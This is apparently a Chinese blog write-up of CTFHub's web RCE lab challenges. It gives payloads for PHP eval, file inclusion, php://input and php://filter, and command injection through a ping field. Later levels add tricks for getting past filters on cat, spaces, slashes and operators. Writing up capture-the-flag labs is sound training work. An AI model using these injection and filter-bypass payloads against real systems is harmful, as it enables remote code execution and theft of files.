ctfhub技能树 web rce

文章详细介绍了在CTF(CaptureTheFlag)竞赛中常见的几种利用payload执行系统命令的技术,包括eval执行、文件包含、php://input的使用,以及如何应对各种过滤策略,如过滤cat、空格、目录分隔符和运算符等。这些技巧展示了黑客可能利用的安全漏洞以及防御措施。
摘要由CSDN通过智能技术生成

1.eval执行

在这里插入图片描述
payload:

查看文件
cmd=system('ls');
读取flag
cmd=system('cat /flag_12119');

2.文件包含

在这里插入图片描述
shell.txt
在这里插入图片描述
payload:

file=shell.txt&ctfhub=system(%27ls%20/%27);
file=shell.txt&ctfhub=system(%27cat%20/flag%27);

3.php://input

在这里插入图片描述
一定要有php://有两种
php://input
php://filter
paylaod:
file=php://input

file=php://input
post传入
<?php system('ls /')?>
<?php system('cat /flag_6888')?>

4.读取源代码

在这里插入图片描述
一定要有php://有两种
php://input
php://filter
php://input用不了
payload:

file=php://filter/read=convert.base64-encode/reousrce=../../../flag
flag base解码即可

5.远程包含

在这里插入图片描述

payload:

file=php://input
post传入
<?php system('cat /fl*')?>

6.命令注入

在这里插入图片描述
payload:

127.0.0.1&&ls
127.0.0.1&&cat  25906629931640.php

7.过滤cat

payload:

127.0.0.1&&ls
127.0.0.1&&tac   flag_60971518225317.php

8.过滤空格

payload:

127.0.0.1&&ls
127.0.0.1&&tac${IFS}flag_138002540310008.php

9.过滤目录分隔符

在这里插入图片描述
paylaod:

127.0.0.1&&ls
127.0.0.1;cd flag_is_here;cat flag_139192016711116.php
127.0.0.1&&cd flag_is_here&&cat flag_139192016711116.php

10.过滤运算符

在这里插入图片描述
payload:

127.0.0.1;ls
127.0.0.1;cat flag_15470222637038.php

11.综合过滤

在这里插入图片描述
paylaod:

127.0.0.1%0als${IFS}fl??_is_here
127.0.0.1%0atac${IFS}fl??_is_here${PWD:0:1}fl*

参考文章:
ctfhub rce

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值